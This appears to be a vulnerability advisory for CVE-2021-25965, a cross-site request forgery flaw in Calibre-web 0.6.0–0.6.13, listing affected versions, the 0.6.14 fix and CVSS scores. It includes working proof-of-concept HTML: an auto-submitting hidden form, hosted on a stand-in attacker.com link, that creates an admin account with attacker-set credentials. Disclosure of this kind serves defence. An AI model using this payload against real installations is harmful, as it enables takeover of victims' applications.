icon

We found results for “

CVE-2021-25965

Date: November 16, 2021

Overview

In Calibre-web, versions 0.6.0 to 0.6.13 are vulnerable to Cross-Site Request Forgery (CSRF). By luring an authenticated user to click on a link, an attacker can create a new user role with admin privileges and attacker-controlled credentials, allowing them to take over the application.

Details

The “Calibre-web” application is vulnerable to “Cross site request forgery”. By forcing an authenticated user to submit a request , it is possible to create a new user role with admin privileges.

PoC Details

Create a malicious HTML file with the payload given below (csrf.html), and store it in an attacker controlled server (so that it can be accessed through a link, for example - https://attacker.com/csrf.html).
Login into application as admin (the victim). Now, click on the attacker’s link. The payload will be executed and a new admin user with attacker-controlled credentials will be created. This will allow the attacker to take over the application as a highly-privileged user.

PoC Code

// Contents of "csrf.html"
<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
       <form id="myForm" name="myForm" method="POST" action="http://localhost:8083/admin/user/new">
tt<input type="hidden" name="name" value="cen">
tt<input type="hidden" name="email" value="cen@calibre.com">
tt<input type="hidden" name="password" value="Cen@123">
tt<input type="hidden" name="kindle_mail" value="">
tt<input type="hidden" name="locale" value="en">
tt<input type="hidden" name="default_language" value="all">
tt<input type="hidden" name="show_16" value="on">
tt<input type="hidden" name="show_65536" value="on">
tt<input type="hidden" name="show_128" value="on">
tt<input type="hidden" name="show_256" value="on">
tt<input type="hidden" name="show_32" value="on">
tt<input type="hidden" name="show_8" value="on">
tt<input type="hidden" name="show_4" value="on">
tt<input type="hidden" name="show_64" value="on">
tt<input type="hidden" name="show_4096" value="on">
tt<input type="hidden" name="show_2" value="on">
tt<input type="hidden" name="show_8192" value="on">
tt<input type="hidden" name="show_16384" value="on">
tt<input type="hidden" name="show_32768" value="on">
tt<input type="hidden" name="show_131072" value="on">
tt<input type="hidden" name="Show_detail_random" value="on">
tt<input type="hidden" name="admin_role" value="on">
tt<input type="hidden" name="download_role" value="on">
tt<input type="hidden" name="viewer_role" value="on">
tt<input type="hidden" name="upload_role" value="on">
tt<input type="hidden" name="edit_role" value="on">
tt<input type="hidden" name="delete_role" value="on">
tt<input type="hidden" name="passwd_role" value="on">
tt<input type="hidden" name="edit_shelf_role" value="on">
t</form>
</body>
</html>

Affected Environments

Calibre-web versions v0.6.0 to v0.6.13

Prevention

Update to calibreweb version 0.6.14

Language: Python

Good to know:

icon
icon

Cross-Site Request Forgery (CSRF)

CWE-352
icon

Upgrade Version

Upgrade to version calibreweb - 0.6.14

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privilegs Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: